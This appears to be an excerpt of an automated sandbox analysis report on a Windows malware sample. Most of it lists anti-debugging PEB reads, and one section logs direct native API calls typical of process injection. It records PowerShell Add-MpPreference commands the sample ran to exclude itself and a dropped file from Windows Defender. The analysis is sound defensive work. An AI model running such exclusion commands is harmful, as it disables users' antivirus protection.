            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE5E7 mov eax, dword ptr fs:[00000030h]12_2_013FE5E7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE5E7 mov eax, dword ptr fs:[00000030h]12_2_013FE5E7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE5E7 mov eax, dword ptr fs:[00000030h]12_2_013FE5E7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE5E7 mov eax, dword ptr fs:[00000030h]12_2_013FE5E7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE5E7 mov eax, dword ptr fs:[00000030h]12_2_013FE5E7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE5E7 mov eax, dword ptr fs:[00000030h]12_2_013FE5E7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E59C mov eax, dword ptr fs:[00000030h]12_2_0140E59C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D25E0 mov eax, dword ptr fs:[00000030h]12_2_013D25E0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014505A7 mov eax, dword ptr fs:[00000030h]12_2_014505A7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014505A7 mov eax, dword ptr fs:[00000030h]12_2_014505A7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014505A7 mov eax, dword ptr fs:[00000030h]12_2_014505A7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D65D0 mov eax, dword ptr fs:[00000030h]12_2_013D65D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E443 mov eax, dword ptr fs:[00000030h]12_2_0140E443
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E443 mov eax, dword ptr fs:[00000030h]12_2_0140E443
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E443 mov eax, dword ptr fs:[00000030h]12_2_0140E443
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E443 mov eax, dword ptr fs:[00000030h]12_2_0140E443
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E443 mov eax, dword ptr fs:[00000030h]12_2_0140E443
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E443 mov eax, dword ptr fs:[00000030h]12_2_0140E443
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E443 mov eax, dword ptr fs:[00000030h]12_2_0140E443
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E443 mov eax, dword ptr fs:[00000030h]12_2_0140E443
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CC427 mov eax, dword ptr fs:[00000030h]12_2_013CC427
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CE420 mov eax, dword ptr fs:[00000030h]12_2_013CE420
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CE420 mov eax, dword ptr fs:[00000030h]12_2_013CE420
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CE420 mov eax, dword ptr fs:[00000030h]12_2_013CE420
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0148A456 mov eax, dword ptr fs:[00000030h]12_2_0148A456
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145C460 mov ecx, dword ptr fs:[00000030h]12_2_0145C460
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01408402 mov eax, dword ptr fs:[00000030h]12_2_01408402
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01408402 mov eax, dword ptr fs:[00000030h]12_2_01408402
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01408402 mov eax, dword ptr fs:[00000030h]12_2_01408402
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FA470 mov eax, dword ptr fs:[00000030h]12_2_013FA470
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FA470 mov eax, dword ptr fs:[00000030h]12_2_013FA470
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FA470 mov eax, dword ptr fs:[00000030h]12_2_013FA470
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013C645D mov eax, dword ptr fs:[00000030h]12_2_013C645D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F245A mov eax, dword ptr fs:[00000030h]12_2_013F245A
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01456420 mov eax, dword ptr fs:[00000030h]12_2_01456420
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01456420 mov eax, dword ptr fs:[00000030h]12_2_01456420
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01456420 mov eax, dword ptr fs:[00000030h]12_2_01456420
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01456420 mov eax, dword ptr fs:[00000030h]12_2_01456420
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01456420 mov eax, dword ptr fs:[00000030h]12_2_01456420
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01456420 mov eax, dword ptr fs:[00000030h]12_2_01456420
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01456420 mov eax, dword ptr fs:[00000030h]12_2_01456420
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140A430 mov eax, dword ptr fs:[00000030h]12_2_0140A430
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D64AB mov eax, dword ptr fs:[00000030h]12_2_013D64AB
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0148A49A mov eax, dword ptr fs:[00000030h]12_2_0148A49A
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D04E5 mov ecx, dword ptr fs:[00000030h]12_2_013D04E5
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014044B0 mov ecx, dword ptr fs:[00000030h]12_2_014044B0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145A4B0 mov eax, dword ptr fs:[00000030h]12_2_0145A4B0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140674D mov esi, dword ptr fs:[00000030h]12_2_0140674D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140674D mov eax, dword ptr fs:[00000030h]12_2_0140674D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140674D mov eax, dword ptr fs:[00000030h]12_2_0140674D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01454755 mov eax, dword ptr fs:[00000030h]12_2_01454755
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412750 mov eax, dword ptr fs:[00000030h]12_2_01412750
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412750 mov eax, dword ptr fs:[00000030h]12_2_01412750
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145E75D mov eax, dword ptr fs:[00000030h]12_2_0145E75D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D0710 mov eax, dword ptr fs:[00000030h]12_2_013D0710
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140C700 mov eax, dword ptr fs:[00000030h]12_2_0140C700
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D8770 mov eax, dword ptr fs:[00000030h]12_2_013D8770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01400710 mov eax, dword ptr fs:[00000030h]12_2_01400710
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140C720 mov eax, dword ptr fs:[00000030h]12_2_0140C720
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140C720 mov eax, dword ptr fs:[00000030h]12_2_0140C720
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D0750 mov eax, dword ptr fs:[00000030h]12_2_013D0750
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144C730 mov eax, dword ptr fs:[00000030h]12_2_0144C730
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140273C mov eax, dword ptr fs:[00000030h]12_2_0140273C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140273C mov ecx, dword ptr fs:[00000030h]12_2_0140273C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140273C mov eax, dword ptr fs:[00000030h]12_2_0140273C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014507C3 mov eax, dword ptr fs:[00000030h]12_2_014507C3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D07AF mov eax, dword ptr fs:[00000030h]12_2_013D07AF
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145E7E1 mov eax, dword ptr fs:[00000030h]12_2_0145E7E1
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D47FB mov eax, dword ptr fs:[00000030h]12_2_013D47FB
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D47FB mov eax, dword ptr fs:[00000030h]12_2_013D47FB
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147678E mov eax, dword ptr fs:[00000030h]12_2_0147678E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F27ED mov eax, dword ptr fs:[00000030h]12_2_013F27ED
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F27ED mov eax, dword ptr fs:[00000030h]12_2_013F27ED
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F27ED mov eax, dword ptr fs:[00000030h]12_2_013F27ED
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014847A0 mov eax, dword ptr fs:[00000030h]12_2_014847A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DC7C0 mov eax, dword ptr fs:[00000030h]12_2_013DC7C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D262C mov eax, dword ptr fs:[00000030h]12_2_013D262C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013EE627 mov eax, dword ptr fs:[00000030h]12_2_013EE627
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140A660 mov eax, dword ptr fs:[00000030h]12_2_0140A660
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140A660 mov eax, dword ptr fs:[00000030h]12_2_0140A660
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149866E mov eax, dword ptr fs:[00000030h]12_2_0149866E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149866E mov eax, dword ptr fs:[00000030h]12_2_0149866E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01402674 mov eax, dword ptr fs:[00000030h]12_2_01402674
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E260B mov eax, dword ptr fs:[00000030h]12_2_013E260B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E260B mov eax, dword ptr fs:[00000030h]12_2_013E260B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E260B mov eax, dword ptr fs:[00000030h]12_2_013E260B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E260B mov eax, dword ptr fs:[00000030h]12_2_013E260B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E260B mov eax, dword ptr fs:[00000030h]12_2_013E260B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E260B mov eax, dword ptr fs:[00000030h]12_2_013E260B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E260B mov eax, dword ptr fs:[00000030h]12_2_013E260B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144E609 mov eax, dword ptr fs:[00000030h]12_2_0144E609
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412619 mov eax, dword ptr fs:[00000030h]12_2_01412619
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01406620 mov eax, dword ptr fs:[00000030h]12_2_01406620
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01408620 mov eax, dword ptr fs:[00000030h]12_2_01408620
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013EC640 mov eax, dword ptr fs:[00000030h]12_2_013EC640
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140A6C7 mov ebx, dword ptr fs:[00000030h]12_2_0140A6C7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140A6C7 mov eax, dword ptr fs:[00000030h]12_2_0140A6C7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D4690 mov eax, dword ptr fs:[00000030h]12_2_013D4690
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D4690 mov eax, dword ptr fs:[00000030h]12_2_013D4690
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014506F1 mov eax, dword ptr fs:[00000030h]12_2_014506F1
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014506F1 mov eax, dword ptr fs:[00000030h]12_2_014506F1
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144E6F2 mov eax, dword ptr fs:[00000030h]12_2_0144E6F2
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144E6F2 mov eax, dword ptr fs:[00000030h]12_2_0144E6F2
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144E6F2 mov eax, dword ptr fs:[00000030h]12_2_0144E6F2
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144E6F2 mov eax, dword ptr fs:[00000030h]12_2_0144E6F2
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140C6A6 mov eax, dword ptr fs:[00000030h]12_2_0140C6A6
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014066B0 mov eax, dword ptr fs:[00000030h]12_2_014066B0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01450946 mov eax, dword ptr fs:[00000030h]12_2_01450946
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A4940 mov eax, dword ptr fs:[00000030h]12_2_014A4940
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013C8918 mov eax, dword ptr fs:[00000030h]12_2_013C8918
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013C8918 mov eax, dword ptr fs:[00000030h]12_2_013C8918
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0141096E mov eax, dword ptr fs:[00000030h]12_2_0141096E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0141096E mov edx, dword ptr fs:[00000030h]12_2_0141096E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0141096E mov eax, dword ptr fs:[00000030h]12_2_0141096E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145C97C mov eax, dword ptr fs:[00000030h]12_2_0145C97C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01474978 mov eax, dword ptr fs:[00000030h]12_2_01474978
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01474978 mov eax, dword ptr fs:[00000030h]12_2_01474978
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144E908 mov eax, dword ptr fs:[00000030h]12_2_0144E908
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144E908 mov eax, dword ptr fs:[00000030h]12_2_0144E908
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145C912 mov eax, dword ptr fs:[00000030h]12_2_0145C912
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F6962 mov eax, dword ptr fs:[00000030h]12_2_013F6962
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F6962 mov eax, dword ptr fs:[00000030h]12_2_013F6962
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F6962 mov eax, dword ptr fs:[00000030h]12_2_013F6962
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0146892B mov eax, dword ptr fs:[00000030h]12_2_0146892B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145892A mov eax, dword ptr fs:[00000030h]12_2_0145892A
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014669C0 mov eax, dword ptr fs:[00000030h]12_2_014669C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D09AD mov eax, dword ptr fs:[00000030h]12_2_013D09AD
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D09AD mov eax, dword ptr fs:[00000030h]12_2_013D09AD
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014049D0 mov eax, dword ptr fs:[00000030h]12_2_014049D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149A9D3 mov eax, dword ptr fs:[00000030h]12_2_0149A9D3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145E9E0 mov eax, dword ptr fs:[00000030h]12_2_0145E9E0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014029F9 mov eax, dword ptr fs:[00000030h]12_2_014029F9
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014029F9 mov eax, dword ptr fs:[00000030h]12_2_014029F9
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA9D0 mov eax, dword ptr fs:[00000030h]12_2_013DA9D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA9D0 mov eax, dword ptr fs:[00000030h]12_2_013DA9D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA9D0 mov eax, dword ptr fs:[00000030h]12_2_013DA9D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA9D0 mov eax, dword ptr fs:[00000030h]12_2_013DA9D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA9D0 mov eax, dword ptr fs:[00000030h]12_2_013DA9D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA9D0 mov eax, dword ptr fs:[00000030h]12_2_013DA9D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014589B3 mov esi, dword ptr fs:[00000030h]12_2_014589B3
            Source: C:\Users\user\Desktop\CFV20240600121.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\CFV20240600121.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\CFV20240600121.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe"
            Source: C:\Users\user\Desktop\CFV20240600121.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtProtectVirtualMemory: Direct from: 0x76EE7B2E
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtCreateUserProcess: Direct from: 0x76EF371C
